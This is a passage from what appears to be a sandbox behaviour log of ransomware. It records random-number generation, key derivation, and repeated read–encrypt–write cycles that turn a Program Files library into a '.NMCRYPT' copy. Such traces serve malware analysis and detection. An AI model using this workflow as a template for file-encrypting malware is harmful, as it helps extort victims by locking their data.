CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.480] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.481] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.481] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0167.481] CryptHashData (hHash=0x9ad238, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.481] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad7f8) returned 1 [0167.481] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0167.481] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0167.481] wcslen (_String="\\\\?\\") returned 0x4 [0167.481] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad178) returned 1 [0167.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0167.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0167.483] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=71168) returned 1 [0167.483] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0167.483] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.485] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.485] GetLastError () returned 0x0 [0167.485] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.501] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.501] GetLastError () returned 0x0 [0167.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.501] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.501] GetLastError () returned 0x0 [0167.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.501] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.501] GetLastError () returned 0x0 [0167.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.501] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.501] GetLastError () returned 0x0 [0167.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.502] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.502] GetLastError () returned 0x0 [0167.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.502] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.502] GetLastError () returned 0x0 [0167.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.502] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.502] GetLastError () returned 0x0 [0167.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.502] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.502] GetLastError () returned 0x0 [0167.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.502] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.502] GetLastError () returned 0x0 [0167.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.502] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.502] GetLastError () returned 0x0 [0167.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.502] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.502] GetLastError () returned 0x0 [0167.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.503] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.503] GetLastError () returned 0x0 [0167.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.503] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.503] GetLastError () returned 0x0 [0167.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.503] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.503] GetLastError () returned 0x0 [0167.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.503] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.503] GetLastError () returned 0x0 [0167.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.503] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.503] GetLastError () returned 0x0 [0167.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.503] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.503] GetLastError () returned 0x0 [0167.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.504] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.504] GetLastError () returned 0x0 [0167.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.504] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.504] GetLastError () returned 0x0 [0167.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 